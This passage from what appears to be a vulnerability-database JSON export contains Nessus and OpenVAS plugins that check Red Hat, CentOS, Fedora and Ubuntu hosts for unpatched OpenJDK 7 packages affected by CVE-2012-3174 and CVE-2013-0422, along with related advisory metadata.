plugin were \n# extracted from Red Hat Security Advisory RHSA-2013:0165. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(63590);\n script_version (\"1.26\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/24\");\n\n script_cve_id(\"CVE-2012-3174\", \"CVE-2013-0422\");\n script_bugtraq_id(57246, 57312);\n script_xref(name:\"RHSA\", value:\"2013:0165\");\n\n script_name(english:\"RHEL 5 / 6 : java-1.7.0-openjdk (RHSA-2013:0165)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated java-1.7.0-openjdk packages that fix two security issues are\nnow available for Red Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThese packages provide the OpenJDK 7 Java Runtime Environment and the\nOpenJDK 7 Software Development Kit.\n\nTwo improper permission check issues were discovered in the reflection\nAPI in OpenJDK. An untrusted Java application or applet could use\nthese flaws to bypass Java sandbox restrictions. (CVE-2012-3174,\nCVE-2013-0422)\n\nThis erratum also upgrades the OpenJDK package to IcedTea7 2.3.4.\nRefer to the NEWS file, linked to in the References, for further\ninformation.\n\nAll users of java-1.7.0-openjdk are advised to upgrade to these\nupdated packages, which resolve these issues. 
All running instances of\nOpenJDK Java must be restarted for the update to take effect.\"\n );\n # http://icedtea.classpath.org/hg/release/icedtea7-2.3/file/icedtea-2.3.4/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?646d4ea1\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2013:0165\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-3174\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-0422\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Java Applet JMX Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.7.0-openjdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.7.0-openjdk-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.7.0-openjdk-demo\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:java-1.7.0-openjdk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.7.0-openjdk-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.7.0-openjdk-src\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.9\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/01/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/17\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x / 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2013:0165\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.7.0-openjdk-1.7.0.9-2.3.4.el5_9.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.7.0-openjdk-1.7.0.9-2.3.4.el5_9.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.4.el5_9.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.4.el5_9.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.7.0-openjdk-demo-1.7.0.9-2.3.4.el5_9.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.7.0-openjdk-demo-1.7.0.9-2.3.4.el5_9.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.7.0-openjdk-devel-1.7.0.9-2.3.4.el5_9.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.7.0-openjdk-devel-1.7.0.9-2.3.4.el5_9.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.7.0-openjdk-javadoc-1.7.0.9-2.3.4.el5_9.1\")) 
flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.7.0-openjdk-javadoc-1.7.0.9-2.3.4.el5_9.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.7.0-openjdk-src-1.7.0.9-2.3.4.el5_9.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.7.0-openjdk-src-1.7.0.9-2.3.4.el5_9.1\")) flag++;\n\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"java-1.7.0-openjdk-1.7.0.9-2.3.4.1.el6_3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"java-1.7.0-openjdk-1.7.0.9-2.3.4.1.el6_3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.4.1.el6_3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.4.1.el6_3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"java-1.7.0-openjdk-demo-1.7.0.9-2.3.4.1.el6_3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"java-1.7.0-openjdk-demo-1.7.0.9-2.3.4.1.el6_3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"java-1.7.0-openjdk-devel-1.7.0.9-2.3.4.1.el6_3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"java-1.7.0-openjdk-devel-1.7.0.9-2.3.4.1.el6_3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"java-1.7.0-openjdk-javadoc-1.7.0.9-2.3.4.1.el6_3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"java-1.7.0-openjdk-src-1.7.0.9-2.3.4.1.el6_3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"java-1.7.0-openjdk-src-1.7.0.9-2.3.4.1.el6_3\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else 
audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1.7.0-openjdk / java-1.7.0-openjdk-debuginfo / etc\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "description": "The OpenJDK runtime environment. ", "modified": "2013-01-16T19:35:17", "published": "2013-01-16T19:35:17", "id": "FEDORA:4A3812148A", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 18 Update: java-1.7.0-openjdk-1.7.0.9-2.3.4.fc18", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-3174", "CVE-2012-4681", "CVE-2013-0422"], "description": "The OpenJDK runtime environment. ", "modified": "2013-01-16T19:42:39", "published": "2013-01-16T19:42:39", "id": "FEDORA:B66CF208CD", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: java-1.7.0-openjdk-1.7.0.9-2.3.4.fc17", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2011-3389", "CVE-2011-3521", "CVE-2011-3544", "CVE-2011-3547", "CVE-2011-3548", "CVE-2011-3551", "CVE-2011-3552", "CVE-2011-3554", "CVE-2011-3556", "CVE-2011-3557", "CVE-2011-3558", "CVE-2011-3560", "CVE-2011-3563", "CVE-2011-3571", "CVE-2011-5035", "CVE-2012-0497", "CVE-2012-0501", "CVE-2012-0502", "CVE-2012-0503", "CVE-2012-0505", "CVE-2012-0506", "CVE-2012-3174", "CVE-2012-4681", "CVE-2013-0422"], "description": "The OpenJDK runtime environment. 
", "modified": "2013-01-16T19:49:12", "published": "2013-01-16T19:49:12", "id": "FEDORA:D68E221277", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 16 Update: java-1.7.0-openjdk-1.7.0.9-2.3.4.fc16", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2017-12-04T11:22:07", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "description": "Check for the Version of openjdk-7", "modified": "2017-12-01T00:00:00", "published": "2013-01-21T00:00:00", "id": "OPENVAS:841283", "href": "http://plugins.openvas.org/nasl.php?oid=841283", "type": "openvas", "title": "Ubuntu Update for openjdk-7 USN-1693-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1693_1.nasl 7958 2017-12-01 06:47:47Z santu $\n#\n# Ubuntu Update for openjdk-7 USN-1693-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"openjdk-7 on Ubuntu 12.10\";\ntag_insight = \"It was discovered that OpenJDK 7's security mechanism could be bypassed via\n Java applets. 
If a user were tricked into opening a malicious website, a\n remote attacker could exploit this to perform arbitrary code execution as\n the user invoking the program.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1693-1/\");\n script_id(841283);\n script_version(\"$Revision: 7958 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 07:47:47 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-21 09:50:59 +0530 (Mon, 21 Jan 2013)\");\n script_cve_id(\"CVE-2012-3174\", \"CVE-2013-0422\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"USN\", value: \"1693-1\");\n script_name(\"Ubuntu Update for openjdk-7 USN-1693-1\");\n\n script_summary(\"Check for the Version of openjdk-7\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU12.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"icedtea-7-jre-cacao\", ver:\"7u9-2.3.4-0ubuntu1.12.10.1\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"icedtea-7-jre-jamvm\", ver:\"7u9-2.3.4-0ubuntu1.12.10.1\", rls:\"UBUNTU12.10\")) != NULL)\n 
{\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-7-jre\", ver:\"7u9-2.3.4-0ubuntu1.12.10.1\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-7-jre-headless\", ver:\"7u9-2.3.4-0ubuntu1.12.10.1\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-7-jre-lib\", ver:\"7u9-2.3.4-0ubuntu1.12.10.1\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-7-jre-zero\", ver:\"7u9-2.3.4-0ubuntu1.12.10.1\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-26T11:09:54", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "description": "Check for the Version of java-1.7.0-openjdk", "modified": "2018-01-26T00:00:00", "published": "2013-01-21T00:00:00", "id": "OPENVAS:865170", "href": "http://plugins.openvas.org/nasl.php?oid=865170", "type": "openvas", "title": "Fedora Update for java-1.7.0-openjdk FEDORA-2013-0853", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for java-1.7.0-openjdk FEDORA-2013-0853\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS 
FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"java-1.7.0-openjdk on Fedora 18\";\ntag_insight = \"The OpenJDK runtime environment.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2013-January/096967.html\");\n script_id(865170);\n script_version(\"$Revision: 8542 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-26 07:57:28 +0100 (Fri, 26 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-21 09:33:40 +0530 (Mon, 21 Jan 2013)\");\n script_cve_id(\"CVE-2013-0422\", \"CVE-2012-3174\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2013-0853\");\n script_name(\"Fedora Update for java-1.7.0-openjdk FEDORA-2013-0853\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of java-1.7.0-openjdk\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n 
exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC18\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk\", rpm:\"java-1.7.0-openjdk~1.7.0.9~2.3.4.fc18\", rls:\"FC18\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:11", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "description": "The remote host is missing an update for the 'java' package(s) announced via the referenced advisory.", "modified": "2019-03-15T00:00:00", "published": "2013-01-21T00:00:00", "id": "OPENVAS:1361412562310881557", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881557", "type": "openvas", "title": "CentOS Update for java CESA-2013:0165 centos5", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for java CESA-2013:0165 centos5\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2013-January/019203.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881557\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-21 09:37:56 +0530 (Mon, 21 Jan 2013)\");\n script_cve_id(\"CVE-2012-3174\", \"CVE-2013-0422\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"CESA\", value:\"2013:0165\");\n script_name(\"CentOS Update for java CESA-2013:0165 centos5\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'java'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n script_tag(name:\"affected\", value:\"java on CentOS 5\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"These packages provide the OpenJDK 7 Java Runtime Environment and the\n OpenJDK 7 Software Development Kit.\n\n Two improper permission check issues were discovered in the reflection API\n in OpenJDK. 
An untrusted Java application or applet could use these flaws\n to bypass Java sandbox restrictions. (CVE-2012-3174, CVE-2013-0422)\n\n This erratum also upgrades the OpenJDK package to IcedTea7 2.3.4. Refer to\n the NEWS file, linked to in the References, for further information.\n\n All users of java-1.7.0-openjdk are advised to upgrade to these updated\n packages, which resolve these issues. All running instances of OpenJDK Java\n must be restarted for the update to take effect.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk\", rpm:\"java-1.7.0-openjdk~1.7.0.9~2.3.4.el5_9.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-demo\", rpm:\"java-1.7.0-openjdk-demo~1.7.0.9~2.3.4.el5_9.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-devel\", rpm:\"java-1.7.0-openjdk-devel~1.7.0.9~2.3.4.el5_9.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-javadoc\", rpm:\"java-1.7.0-openjdk-javadoc~1.7.0.9~2.3.4.el5_9.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-src\", rpm:\"java-1.7.0-openjdk-src~1.7.0.9~2.3.4.el5_9.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:09", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "description": "The remote host is 
missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2013-01-21T00:00:00", "id": "OPENVAS:1361412562310865170", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310865170", "type": "openvas", "title": "Fedora Update for java-1.7.0-openjdk FEDORA-2013-0853", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for java-1.7.0-openjdk FEDORA-2013-0853\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2013-January/096967.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.865170\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-21 09:33:40 +0530 (Mon, 21 Jan 2013)\");\n script_cve_id(\"CVE-2013-0422\", \"CVE-2012-3174\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"FEDORA\", value:\"2013-0853\");\n script_name(\"Fedora Update for java-1.7.0-openjdk FEDORA-2013-0853\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'java-1.7.0-openjdk'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC18\");\n script_tag(name:\"affected\", value:\"java-1.7.0-openjdk on Fedora 18\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = 
